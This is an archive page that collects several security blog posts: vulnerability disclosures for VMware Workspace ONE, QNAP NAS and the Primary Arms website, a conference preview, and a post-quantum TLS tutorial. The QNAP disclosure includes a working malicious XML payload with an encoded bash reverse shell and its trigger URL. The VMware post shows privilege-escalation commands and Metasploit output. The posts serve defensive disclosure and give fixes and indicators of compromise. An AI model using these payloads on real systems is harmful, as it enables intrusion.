Tag Archives: research

CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/

CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE

The VMware Workspace ONE Access, Identity Manager, and vRealize Automation products contain a locally exploitable vulnerability whereby the under-privileged horizon user can escalate their permissions to those of the root user. Notably, the horizon user runs the externally accessible web application. This means that remote code execution (RCE) within that component could be chained with this vulnerability to obtain remote code execution as the root user. At the time of this writing, CVE-2022-22954 is one such RCE vulnerability (that notably has a corresponding Metasploit module here) that can be easily chained with one or both of the issues described herein.

Product description

VMWare Workspace ONE Access is a platform that provides organizations with the means to provide their employees fast and easy access to applications they need. VMware Workspace ONE Access was formerly known as VMware Identity Manager.

Impact

These vulnerabilities are local privilege escalation flaws, and by themselves, present little risk in an otherwise secure environment. In both cases, the local user must be horizon for successful exploitation.

That said, it’s important to note that the horizon user runs the externally accessible web application, which has seen several recent vulnerabilities — namely CVE-2022-22954, which, when exploited, allows for remote code execution as the horizon user. Thus, chaining an exploit for CVE-2022-22954 with either of these vulnerabilities can allow a remote attacker to go from no access to root access in two steps.

Credit

These issues were disclosed by VMware on Tuesday, August 2, 2022 within the VMSA-2022-0021 bulletin. In June, Spencer McIntyre of Rapid7 discovered these issues while researching an unrelated vulnerability. They were disclosed in accordance with Rapid7’s vulnerability disclosure policy.

CVE-2022-31660

CVE-2022-31660 arises from the fact that the permissions on the file /opt/vmware/certproxy/bin/cert-proxy.sh are such that the horizon user is both the owner and has access to invoke this file.

To demonstrate and exploit this vulnerability, that file is overwritten, and then the following command is executed as the horizon user:

sudo /usr/local/horizon/scripts/certproxyService.sh restart

Note that, depending on the patch level of the system, the certproxyService.sh script may be located at an alternative path and require a slightly different command:

sudo /opt/vmware/certproxy/bin/certproxyService.sh restart

In both cases, the horizon user is able to invoke the certproxyService.sh script from sudo without a password. This can be verified by executing sudo -n --list. The certproxyService.sh script invokes the systemctl command to restart the service based on its configuration file. The service configuration file, located at /run/systemd/generator.late/vmware-certproxy.service, dispatches to /etc/rc.d/init.d/vmware-certproxy through the ExecStart and ExecStop directives, which in turn executes /opt/vmware/certproxy/bin/cert-proxy.sh.

Proof of concept

To demonstrate this vulnerability, a Metasploit module was written and submitted on GitHub in PR #16854.

With an existing Meterpreter session, no options other than the SESSION need to be specified. Everything else will be automatically determined at runtime. In this scenario, the original Meterpreter session was obtained with the module for CVE-2022-22954, released earlier this year.

[*] Sending stage (40132 bytes) to 192.168.159.98
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400

meterpreter > sysinfo
Computer        : photon-machine
OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: horizon
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe 
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
SESSION => -1
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run

[*] Started reverse TCP handler on 192.168.250.134:4444 
[*] Backing up the original file...
[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
[*] Triggering the payload...
[*] Sending stage (40132 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400
[*] Restoring file contents...
[*] Restoring file permissions...

meterpreter > getuid
Server username: root
meterpreter >

CVE-2022-31661

CVE-2022-31660 arises from the fact that the /usr/local/horizon/scripts/getProtectedLogFiles.hzn script can be run with root privileges without a password using the sudo command. This script in turn will recursively change the ownership of a user-supplied directory to the horizon user, effectively granting them write permissions to all contents.

To demonstrate and exploit this vulnerability, we can execute the following command as the horizon user:

sudo /usr/local/horizon/scripts/getProtectedLogFiles.hzn exportProtectedLogs /usr/local/horizon/scripts/

At this point, the horizon user has write access (through ownership) to a variety of scripts that also have the right to invoke using sudo without a password. These scripts can be verified by executing sudo -n --list. A careful attacker would have backed up the ownership information for each file in the directory they intend to target and restored them once they had obtained root-level permissions.

The root cause of this vulnerability is that the exportProtectedLogs subcommand invokes the getProtectedLogs function that will change the ownership information to the TOMCAT_USER, which happens to be horizon.

Excerpt from getProtectedLogFiles.hzn:

function getProtectedLogs()
{
    chown ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION
    rm -f $TARGET_DIR_LOCATION/messages*
    rm -f $TARGET_DIR_LOCATION/boot*
    rm -rf $TARGET_DIR_LOCATION/journal*

    cp $VAR_LOG_MESSAGES* $TARGET_DIR_LOCATION
    cp $BOOT_LOG_MESSAGES* $TARGET_DIR_LOCATION
    chown -R ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION/

}

Remediation

Users should apply patches released in VMSA-2022-0021 to remediate these vulnerabilities. If they are unable to, users should segment the appliance from remote access, especially if known issues in the web front end like CVE-2022-22954 also remain unpatched.

Note that fixing these vulnerabilities helps shore up internal, local defenses against attacks targeting external interfaces. For practical purposes, these issues are merely internal, local privilege escalation issues, so enterprises running VMWare Workspace One Access installations with current patch levels should schedule updates addressing these issues as part of routine patch cycles.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to vulnerabilities described in VMSA-2022-0021 with authenticated, version-based coverage released on August 4, 2022 (ContentOnly-content-1.1.2606-202208041718).

Disclosure timeline

  • May 20, 2022 – Issue discovered by Spencer McIntyre of Rapid7
  • June 28, 2022 – Rapid7 discloses the vulnerability to VMware
  • June 29, 2022 – VMware acknowledges receiving the details and begins an * investigation
  • June 30, 2022 – VMware confirms that they have reproduced the issues, requests that Rapid7 not involve CERT for simplicity’s sake
  • July 1, 2022 – Rapid7 replies, agreeing to leave CERT out
  • July 22, 2022 – VMware states they will publish an advisory once the issues have been fixed, asks whom to credit
  • July 22, 2022 – Rapid7 responds confirming credit, inquires about a target date for a fix
  • August 2, 2022 – VMware discloses these vulnerabilities as part of VMSA-2022-0021 (without alerting Rapid7 of pending disclosure)
  • August 2, 2022 – Metasploit module submitted on GitHub in PR #16854
  • August 5, 2022 – This disclosure blog

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

What We’re Looking Forward to at Black Hat, DEF CON, and BSidesLV 2022

Post Syndicated from Jesse Mack original https://blog.rapid7.com/2022/08/04/what-were-looking-forward-to-at-black-hat-def-con-and-bsideslv-2022/

What We're Looking Forward to at Black Hat, DEF CON, and BSidesLV 2022

The week of Black Hat, DEF CON, and BSides is highly anticipated annual tradition for the cybersecurity community, a weeklong chance for security pros from all corners of the industry to meet in Las Vegas to talk shop and share what they’ve spent the last 12 months working on.

But like many beloved in-person events, 2020 and 2021 put a major damper on this tradition for the security community, known unofficially as Hacker Summer Camp. Black Hat returned in 2021, but with a much heavier emphasis than previous years on virtual events over in-person offerings, and many of those who would have attended in non-COVID times opted to take in the briefings from their home offices instead of flying out to Vegas.

This year, however, the week of Black Hat is back in action, in a form that feels much more familiar for those who’ve spent years making the pilgrimage to Vegas each August. That includes a whole lot of Rapid7 team members — it’s been a busy few years for our research and product teams alike, and we’ve got a lot to catch our colleagues up on. Here’s a sneak peek of what we have planned from August 9-12 at this all-star lineup of cybersecurity sessions.

BSidesLV

The week kicks off on Tuesday, August 9 with BSides, a two-day event running on the 9th and 10th that gives security pros, and those looking to enter the field, a chance to come together and share knowledge. Several Rapid7 presenters will be speaking at BSidesLV, including:

  • Ron Bowes, Lead Security Researcher, who will talk about the surprising overlap between spotting cybersecurity vulnerabilities and writing capture-the-flag (CTF) challenges in his presentation “From Vulnerability to CTF.”
  • Jen Ellis, Vice President of Community and Public Affairs, who will cover the ways in which ransomware and major vulnerabilities have impacted the thinking and decisions of government policymakers in her talk “Hot Topics From Policy and the DoJ.”

Black Hat

The heart of the week’s activities, Black Hat, features the highest concentration of presentations out of the three conferences. Our Research team will be leading the charge for Rapid7’s sessions, with appearances from:

  • Curt Barnard, Principal Security Researcher, who will talk about a new way to search for default credentials more easily in his session, "Defaultinator: An Open Source Search Tool for Default Credentials."
  • Spencer McIntyre, Lead Security Researcher, who’ll be covering the latest in modern attack emulation in his presentation, "The Metasploit Framework."
  • Jake Baines, Lead Security Researcher, who’ll be giving not one but two talks at Black Hat.
    • He’ll cover newly discovered vulnerabilities affecting the Cisco ASA and ASA-X firewalls in "Do Not Trust the ASA, Trojans!"
    • Then, he’ll discuss how the Rapid7 Emergent Threat Response team manages an ever-changing vulnerability landscape in "Learning From and Anticipating Emergent Threats."
  • Tod Beardsley, Director of Research, who’ll be beamed in virtually to tell us how we can improve the coordinated, global vulnerability disclosure (CVD) process in his on-demand presentation, "The Future of Vulnerability Disclosure Processes."

We’ll also be hosting a Community Celebration to welcome our friends and colleagues back to Hacker Summer Camp. Come hang out with us, play games, collect badges, and grab a super-exclusive Rapid7 Hacker Summer Camp t-shirt. Head to our Black Hat event page to preregister today!

DEF CON

Rounding out the week, DEF CON offers lots of opportunities for learning and listening as well as hands-on immersion in its series of “Villages.” Rapid7 experts will be helping run two of these Villages:

  • The IoT Village, where Principal Security Researcher for IoT Deral Heiland will take attendees through a multistep process for hardware hacking.
  • The Car Hacking Village, where Patrick Kiley, Principal Security Consultant/Research Lead, will teach you about hacking actual vehicles in a safe, controlled environment.

We’ll also have no shortage of in-depth talks from our team members, including:

  • Harley Geiger, Public Policy Senior Director, who’ll cover how legislative changes impact the way security research is carried out worldwide in his talk, "Hacking Law Is for Hackers: How Recent Changes to CFAA, DMCA, and Other Laws Affect Security Research."
  • Jen Ellis, who’ll give two talks at DEF CON:
    • "Moving Regulation Upstream: An Increasing Focus on the Role of Digital Service Providers," where she’ll discuss the challenges of drafting effective regulations in an environment where attackers often target smaller organizations that exist below the cybersecurity poverty line.
    • "International Government Action Against Ransomware," a deep dive into policy actions taken by global governments in response to the recent rise in ransomware attacks.
  • Jakes Baines, who’ll be giving his talk "Do Not Trust the ASA, Trojans!" on Saturday, August 13, in case you weren’t able to catch it earlier in the week at Black Hat.

Whew, that’s a lot — time to get your itinerary sorted. Get the full details of what we’re up to at Hacker Summer Camp, and sign up for our Community Celebration on Wednesday, August 10, at our Black Hat 2022 event page.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

QNAP Poisoned XML Command Injection (Silently Patched)

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/

Background

QNAP Poisoned XML Command Injection (Silently Patched)

CVE-2020-2509 was added to CISA’s Known Exploited Vulnerabilities Catalog in April 2022, and it was listed as one of the “Additional Routinely Exploited Vulnerabilities in 2021” in CISA’s 2021 Top Routinely Exploited Vulnerabilities alert. However, CVE-2020-2509 has no public exploit, and no other organizations have publicly confirmed exploitation in the wild.

QNAP Poisoned XML Command Injection (Silently Patched)

CVE-2020-2509 is allegedly an unauthenticated remote command injection vulnerability affecting QNAP Network Attached Storage (NAS) devices using the QTS operating system. The vulnerability was discovered by SAM and publicly disclosed on March 31, 2021. Two weeks later, QNAP issued a CVE and an advisory.

Neither organization provided a CVSS vector to describe the vulnerability. QNAP’s advisory doesn’t even indicate the vulnerable component. SAM’s disclosure says they found the vulnerability when they “fuzzed” the web server’s CGI scripts (which is not generally the way you discover command injection vulnerabilities, but I digress). SAM published a proof-of-concept video that allegedly demonstrates exploitation of the vulnerability, although it doesn’t appear to be a typical straightforward command injection. The recorded exploit downloads BusyBox to establish a reverse shell, and it appears to make multiple requests to accomplish this. That’s many more moving parts than a typical command injection exploit. Regardless, beyond affected versions, there are essentially no usable details for defender or attackers in either disclosure.

Given the ridiculous amount of internet-facing QNAP NAS (350,000+), seemingly endless ransomware attacks on the systems (Qlocker, Deadbolt, and Checkmate), and the mystery surrounding alleged exploitation in the wild of CVE-2020-2509, we decided to find out exactly what CVE-2020-2509 is. Instead, we found the below, which may be an entirely new vulnerability.

Poisoned XML command injection (CVE-2022-XXXX)



QNAP Poisoned XML Command Injection (Silently Patched)

The video demonstrates exploitation of an unauthenticated and remote command injection vulnerability on a QNAP TS-230 running QTS 4.5.1.1480 (reportedly the last version affected by CVE-2020-2509). We were unable to obtain the first patched version, QTS 4.5.1.1495, but we were able to confirm this vulnerability was patched in QTS 4.5.1.1540. However, we don’t think this is CVE-2020-2509. The exploit in the video requires the attacker be a man-in-the-middle or have performed a DNS hijack of update.qnap.com. In the video, our lab network’s Mikrotik router has a malicious static DNS entry for update.qnap.com.

QNAP Poisoned XML Command Injection (Silently Patched)

SAM and QNAP’s disclosures didn’t mention any type of man-in-the-middle or DNS hijacks. But neither disclosure ruled it out either. CVSS vectors are great for this sort of thing. If either organization had published a vector with an Attack Complexity of high, we’d know this “new” vulnerability is CVE-2020-2509. If they’d published a vector with Attack Complexity of low, we’d know this “new” vulnerability is not CVE-2020-2509. The lack of a vector leaves us unsure. Only CISA’s claim of widespread exploitation leads us to believe this is not is CVE-2020-2509. However, this “new” vulnerability is still a high-severity issue. It could reasonably be scored as CVSSv3 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). While the issue was patched 15 to 20 months ago (patches for CVE-2021-2509 were released in November 2020 and April 2021), there are still thousands of internet-facing QNAP devices that remain unpatched against this “new” issue. As such, we are going to describe the issue in more detail.

Exploitation and patch

The “new” vulnerability can be broken down into two parts:

A remote and unauthenticated attacker can force a QNAP device to make an HTTP request to update.qnap.com, without using SSL, in order to download an XML file. Content from the downloaded XML file is passed to a system call without any sanitization.

Both of these issues can be found in the QNAP’s web server cgi-bin executable authLogin.cgi, but the behavior is triggered by a request to /cgi-bin/qnapmsg.cgi. Below is decompiled code from authLogin.cgi that highlights the use of HTTP to fetch a file.

QNAP Poisoned XML Command Injection (Silently Patched)

Using wget, the QNAP device will download a language-specific XML file such as http://update.qnap.com/loginad/qnapmsg_eng.xml, where eng can be a variety of different values (cze, dan, ger, spa, fre, ita, etc.). When the XML has been downloaded, the device then parses the XML file. When the parser encounters <img> tags, it will attempt to download the associated image using wget.

QNAP Poisoned XML Command Injection (Silently Patched)

The <img> value is added to a wget command without any type of sanitization, which is a very obvious command injection issue.

QNAP Poisoned XML Command Injection (Silently Patched)

The XML, if downloaded straight from QNAP, looks like the following (note that it appears to be part of an advertisement system built into the device):

<?xml version="1.0" encoding="utf-8"?>
<Root>
  <Messages>
    <Message>
      <img>http://update.qnap.com/loginad/image/1_eng.jpg</img>
      <link>http://www.qnap.com/en/index.php?lang=en&amp;sn=822&amp;c=351&amp;sc=513&amp;t=520&amp;n=18168</link>
    </Message>
    <Message>
      <img>http://update.qnap.com/loginad/image/4_eng.jpg</img>
      <link>http://www.qnap.com/en/index.php?lang=en&amp;sn=8685</link>
    </Message>
    <Message>
      <img>http://update.qnap.com/loginad/image/2_eng.jpg</img>
      <link>http://www.facebook.com/QNAPSys</link>
    </Message>
  </Messages>
</Root>

Because of the command injection issue, a malicious attacker can get a reverse shell by providing an XML file that looks like the following. The command injection is performed with backticks, and the actual payload (a bash reverse shell using /dev/tcp) is base64 encoded because / is a disallowed character.

​​<?xml version="1.0" encoding="utf-8"?>
<Root>
	<Messages>
		<Message>
			<img>/`echo -ne 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d | sh`</img>
			<link>http://www.qnap.com/></link>
		</Message>
	</Messages>
</Root>

An attacker can force a QNAP device to download the XML file by sending the device an HTTP request similar to http://device_ip/cgi-bin/qnapmsg.cgi?lang=eng. Here, again, eng can be replaced by a variety of languages.

Obviously, the number one challenge to exploit this issue is getting the HTTP requests for update.qnap.com routed to an attacker-controlled system.

QNAP Poisoned XML Command Injection (Silently Patched)

Becoming a man-in-the-middle is not easy for a normal attacker. However, APT groups have consistently demonstrated that man-in-the-middle attacks are a part of normal operations. VPNFilter, FLYING PIG, and the Iranian Digator incident are all historical examples of APT attacking (or potentially attacking) via man-in-the-middle. An actor that has control of any router between the QNAP and update.qnap.com can inject the malicious XML we provided above. This, in turn, allows them to execute arbitrary code on the QNAP device.

QNAP Poisoned XML Command Injection (Silently Patched)

The other major attack vector is via DNS hijacking. For this vulnerability, the most likely DNS hijack attacks that don’t require man-in-the-middling are router DNS hijack or third-party DNS server compromise. In the case of a router DNS hijack, the attacker exploits a router and instructs it to tell all connected devices to use a malicious DNS server or malicious static routes (similar to our lab setup). Third-party DNS server compromise is more interesting because of its ability to scale. Both Mandiant and Talos have observed this type of DNS hijack in the wild. When a third-party DNS server is compromised, an attacker is able to introduce malicious entries to the DNS server.

QNAP Poisoned XML Command Injection (Silently Patched)

So, while there is some complexity to exploiting this issue, those complications are easily defeated by a moderately skilled attacker — which calls into question why QNAP didn’t issue an advisory and CVE for this issue. Presumably they knew about the vulnerability, because they made two changes to fix it. First, the insecure HTTP request for the XML was changed to a secure HTTPS request. That prevents all but the most advanced attackers from masquerading as update.qnap.com. Additionally, the image download logic was updated to use an execl wrapper called qnap_exec instead of system, which mitigates command injection issues.

QNAP Poisoned XML Command Injection (Silently Patched)

Indicators of compromise

This attack does leave indicators of compromise (IOCs) on disk. A smart attacker will clean up these IOCs, but they may be worth checking for. The downloaded XML files are downloaded to /home/httpd/RSS/rssdoc/. The following is an example of the malicious XML from our proof-of-concept video:

[[email protected] rssdoc]$ ls -l
total 32
-rw-r--r-- 1 admin administrators     0 2022-07-27 19:57 gen_qnapmsg_eng.xml
drwxrwxrwx 2 admin administrators  4096 2022-07-26 18:39 image/
-rw-r--r-- 1 admin administrators     8 2022-07-27 19:57 last_uptime.qnapmsg_eng.xml
-rw-r--r-- 1 admin administrators   229 2022-07-27 19:57 qnapmsg_eng.xml
-rw-r--r-- 1 admin administrators 18651 2022-07-27 16:02 wget.log
[[email protected] rssdoc]$ cat qnapmsg_eng.xml 
<?xml version="1.0" encoding="utf-8"?>
<Root>
<Messages>
<Message><img>/`(echo -ne 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d | sh)&`</img><link>http://www.qnap.com/</link></Message></Messages></Root>

Similarly, an attack can leave an sh process hanging in the background. Search for malicious ones using ps | grep wget. If you see anything like the following, it’s a clear IOC:

[[email protected] rssdoc]$ ps | grep wget
10109 albinolo    476 S   grep wget
12555 admin      2492 S   sh -c /usr/bin/wget -t 1 -T 5 /`(echo -ne
'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d |
sh)` -O /home/httpd/RSS/rssdoc/image/`(echo -ne
'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMi43MC4yNTIvMTI3MCAwPiYx' | base64 -d |
sh)`.tmp 1>>/dev/null 2>>/dev/null

Conclusion

Perhaps what we’ve described here is in part CVE-2020-2509, and that explains the lack of advisory from QNAP. Or maybe it’s one of the many other command injections that QNAP has assigned a CVE but failed to describe, and therefore denied users the chance to make informed choices about their security. It’s impossible to know because QNAP publishes almost no details about any of their vulnerabilities — a practice that might thwart some attackers, but certainly harms defenders trying to identify and monitor these attacks in the wild, as well as defenders who have to help clean up the myriad ransomware cases that are affecting QNAP devices.

SAM did not owe us a good disclosure (which is fortunate, because they didn’t give us one), but QNAP did. SAM was successful in ensuring the issue got fixed, and they held the vendor to a coordinated disclosure deadline (which QNAP consequently failed to meet). We should all be grateful to SAM: Even if their disclosure wasn’t necessarily what we wanted, we all benefited from their work. It’s QNAP that owes us, the customers and security industry, good disclosures. Vendors who are responsible for the security of their products are also responsible for informing the community of the seriousness of vulnerabilities that affect those products. When they fail to do this — for example by failing to provide advisories with basic descriptions, affected components, and industry-standard metrics like CVSS — they deny their current and future users full autonomy over the choices they make about risk to their networks. This makes us all less secure.

Disclosure timeline

  • July, 2022: Researched and discovered by Jake Baines of Rapid7
  • Thu, Jul 28, 2022: Disclosed to QNAP, seeking a CVE ID
  • Sun, Jul 31, 2022: Automated response from vendor indicating they have moved to a new support ticket system and ticket should be filed with that system. Link to new ticketing system merely sends Rapid7 to QNAP’s home page.
  • Tue, Aug 2, 2022: Rapid7 informs QNAP via email that their support link is broken and Rapid7 will publish this blog on August 4, 2022.
  • Tue, Aug 2, 2022: QNAP responds directing Rapid7 to the advisory for CVE-2020-2509.
  • Thu, Aug 4, 2022: This public disclosure

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Additional reading:

Experiment with post-quantum cryptography today

Post Syndicated from Bas Westerbaan original https://blog.cloudflare.com/experiment-with-pq/

Experiment with post-quantum cryptography today

Experiment with post-quantum cryptography today

Practically all data sent over the Internet today is at risk in the future if a sufficiently large and stable quantum computer is created. Anyone who captures data now could decrypt it.

Luckily, there is a solution: we can switch to so-called post-quantum (PQ) cryptography, which is designed to be secure against attacks of quantum computers. After a six-year worldwide selection process, in July 2022, NIST announced they will standardize Kyber, a post-quantum key agreement scheme. The standard will be ready in 2024, but we want to help drive the adoption of post-quantum cryptography.

Today we have added support for the X25519Kyber512Draft00 and X25519Kyber768Draft00 hybrid post-quantum key agreements to a number of test domains, including pq.cloudflareresearch.com.

Do you want to experiment with post-quantum on your test website for free? Mail [email protected] to enroll your test website, but read the fine-print below.

What does it mean to enable post-quantum on your website?

If you enroll your website to the post-quantum beta, we will add support for these two extra key agreements alongside the existing classical encryption schemes such as X25519. If your browser doesn’t support these post-quantum key agreements (and none at the time of writing do), then your browser will continue working with a classically secure, but not quantum-resistant, connection.

Then how to test it?

We have open-sourced a fork of BoringSSL and Go that has support for these post-quantum key agreements. With those and an enrolled test domain, you can check how your application performs with post-quantum key exchanges. We are working on support for more libraries and languages.

What to look for?

Kyber and classical key agreements such as X25519 have different performance characteristics: Kyber requires less computation, but has bigger keys and requires a bit more RAM to compute. It could very well make the connection faster if used on its own.

We are not using Kyber on its own though, but are using hybrids. That means we are doing both an X25519 and Kyber key agreement such that the connection is still classically secure if either is broken. That also means that connections will be a bit slower. In our experiments, the difference is very small, but it’s best to check for yourself.

The fine-print

Cloudflare’s post-quantum cryptography support is a beta service for experimental use only. Enabling post-quantum on your website will subject the website to Cloudflare’s Beta Services terms and will impact other Cloudflare services on the website as described below.

No stability or support guarantees

Over the coming months, both Kyber and the way it’s integrated into TLS will change for several reasons, including:

  1. Kyber will see small, but backward-incompatible changes in the coming months.
  2. We want to be compatible with other early adopters and will change our integration accordingly.
  3. As, together with the cryptography community, we find issues, we will add workarounds in our integration.

We will update our forks accordingly, but cannot guarantee any long-term stability or continued support. PQ support may become unavailable at any moment. We will post updates on pq.cloudflareresearch.com.

Features in enrolled domains

For the moment, we are running enrolled zones on a slightly different infrastructure for which not all features, notably QUIC, are available.

With that out of the way, it’s…

Demo time!

BoringSSL

With the following commands build our fork of BoringSSL and create a TLS connection with pq.cloudflareresearch.com using the compiled bssl tool. Note that we do not enable the post-quantum key agreements by default, so you have to pass the -curves flag.

$ git clone https://github.com/cloudflare/boringssl-pq
[snip]
$ cd boringssl-pq && mkdir build && cd build && cmake .. -Gninja && ninja 
[snip]
$ ./tool/bssl client -connect pq.cloudflareresearch.com -server-name pq.cloudflareresearch.com -curves Xyber512D00
	Connecting to [2606:4700:7::a29f:8a55]:443
Connected.
  Version: TLSv1.3
  Resumed session: no
  Cipher: TLS_AES_128_GCM_SHA256
  ECDHE curve: X25519Kyber512Draft00
  Signature algorithm: ecdsa_secp256r1_sha256
  Secure renegotiation: yes
  Extended master secret: yes
  Next protocol negotiated: 
  ALPN protocol: 
  OCSP staple: no
  SCT list: no
  Early data: no
  Encrypted ClientHello: no
  Cert subject: CN = *.pq.cloudflareresearch.com
  Cert issuer: C = US, O = Let's Encrypt, CN = E1

Go

Our Go fork doesn’t enable the post-quantum key agreement by default. The following simple Go program enables PQ by default for the http package and GETs pq.cloudflareresearch.com.

​​package main

import (
  "crypto/tls"
  "fmt"
  "net/http"
)

func main() {
  http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{
    CurvePreferences: []tls.CurveID{tls.X25519Kyber512Draft00, tls.X25519},
    CFEventHandler: func(ev tls.CFEvent) {
      switch e := ev.(type) {
      case tls.CFEventTLS13HRR:
        fmt.Printf("HelloRetryRequest\n")
      case tls.CFEventTLS13NegotiatedKEX:
        switch e.KEX {
        case tls.X25519Kyber512Draft00:
          fmt.Printf("Used X25519Kyber512Draft00\n")
        default:
          fmt.Printf("Used %d\n", e.KEX)
        }
      }
    },
  }

  if _, err := http.Get("https://pq.cloudflareresearch.com"); err != nil {
    fmt.Println(err)
  }
}

To run we need to compile our Go fork:

$ git clone https://github.com/cloudflare/go
[snip]
$ cd go/src && ./all.bash
[snip]
$ ../bin/go run path/to/example.go
Used X25519Kyber512Draft00

On the wire

So what does this look like on the wire? With Wireshark we can capture the packet flow. First a non-post quantum HTTP/2 connection with X25519:

Experiment with post-quantum cryptography today

This is a normal TLS 1.3 handshake: the client sends a ClientHello with an X25519 keyshare, which fits in a single packet. In return, the server sends its own 32 byte X25519 keyshare. It also sends various other messages, such as the certificate chain, which requires two packets in total.

Let’s check out Kyber:

Experiment with post-quantum cryptography today

As you can see the ClientHello is a bit bigger, but still fits within a single packet. The response takes three packets now, instead of two, because of the larger server keyshare.

Under the hood

Want to add client support yourself? We are using a hybrid of X25519 and Kyber version 3.02. We are writing out the details of the latter in version 00 of this CRFG IETF draft, hence the name. We are using TLS group identifiers 0xfe30 and 0xfe31 for X25519Kyber512Draft00 and X25519Kyber768Draft00 respectively.

There are some differences between our Go and BoringSSL forks that are interesting to compare.

  • Our Go fork uses our fast AVX2 optimized implementation of Kyber from CIRCL. In contrast, our BoringSSL fork uses the simpler portable reference implementation. Without the AVX2 optimisations it’s easier to evaluate. The downside is that it’s slower. Don’t be mistaken: it is still very fast, but you can check yourself.
  • Our Go fork only sends one keyshare. If the server doesn’t support it, it will respond with a HelloRetryRequest message and the client will fallback to one the server does support. This adds a roundtrip.
    Our BoringSSL fork, on the other hand, will send two keyshares: the post-quantum hybrid and a classical one (if a classical key agreement is still enabled). If the server doesn’t recognize the first, it will be able to use the second. In this way we avoid a roundtrip if the server does not support the post-quantum key agreement.

Looking ahead

The quantum future is here. In the coming years the Internet will move to post-quantum cryptography. Today we are offering our customers the tools to get a headstart and test post-quantum key agreements. We love to hear your feedback: e-mail it to [email protected].

This is just a small, but important first step. We will continue our efforts to move towards a secure and private quantum-secure Internet. Much more to come — watch this space.

Primary Arms PII Disclosure via IDOR

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/08/02/primary-arms-pii-disclosure-via-idor/

Primary Arms PII Disclosure via IDOR

The Primary Arms website, a popular e-commerce site dealing in firearms and firearms-related merchandise, suffers from an insecure direct object reference (IDOR) vulnerability, which is an instance of CWE-639: Authorization Bypass Through User-Controlled Key.

Rapid7 is disclosing this vulnerability with the intent of providing information that has the potential to help protect the people who may be affected by it – in this case, Primary Arms users. Rapid7 regularly conducts vulnerability research and disclosure on a wide variety of technologies with the goal of improving cybersecurity. We typically disclose vulnerabilities to the vendor first, and in many cases, vulnerability disclosure coordinators like CERT/CC.  In situations where our previous disclosure through the aforementioned channels does not result in progress towards a solution or fix, we disclose unpatched vulnerabilities publicly. In this case, Rapid7 reached out to Primary Arms and federal and state agencies multiple times over a period of months (see “Disclosure Timeline,” below), but the vulnerability has yet to be addressed.

Vulnerabilities in specific websites are usually unremarkable, don’t usually warrant a CVE identifier, and are found and fixed every day. However, Rapid7 has historically publicized issues that presented an outsized risk to specific populations, were popularly mischaracterized, or remained poorly addressed by those most responsible. Some examples that leap to mind are the issues experienced by Ashley Madison and Grindr users, as well as a somewhat similar Yopify plugin issue for Shopify-powered e-commerce sites.

If exploited, this vulnerability has the potential to  allow an authorized user to view the personally identifiable information (PII) of Primary Arms customers, including their home address, phone number, and tracking information of purchases. Note that “authorized users” includes all Primary Arms customers, and user account creation is free and unrestricted.

Because this is a vulnerability on a single website, no CVE identifier has been assigned for this issue. We estimate the CVSSv3.1 calculation to be 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) or 5.3 (PR:N) if one considers this vulnerability is exploitable by any person able to complete a web form.

Product description

Primary Arms is an online firearms and firearms accessories retailer based in Houston, Texas. According to their website, they cater to “firearms enthusiasts, professional shooters, and servicemen and women” and ship firearms to holders of a Federal Firearms License (FFL). The website is built with NetSuite SuiteCommerce.

Discoverer

This issue was discovered by a Rapid7 security researcher and penetration tester through the normal course of personal business as a customer of Primary Arms. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

An authenticated user can inspect the purchase information of other Primary Arms customers by manually navigating to a known or guessed record sales order URL, as demonstrated in the series of screenshots below.

First, in order to demonstrate the vulnerability, I created an account with the username [email protected], which I call “FakeTod FakeBeardsley.”

Primary Arms PII Disclosure via IDOR

Note that FakeTod has no purchase history:

Primary Arms PII Disclosure via IDOR

Next, I’ll simply navigate to the URL of a real purchase, made under my “real” account. An actual attacker would need to learn or guess this URL, which may be easy or difficult (see Impact, below). The screenshot below is a (redacted) view of that sales order receipt.

Primary Arms PII Disclosure via IDOR

The redacted URL is hxxps://www.primaryarms.com/sca-dev-2019-2/my_account.ssp#purchases/view/salesorder/85460532, and the final 8-digit salesorder value is the insecure direct object reference. In this case, we can see:

  • Customer name
  • Purchased item
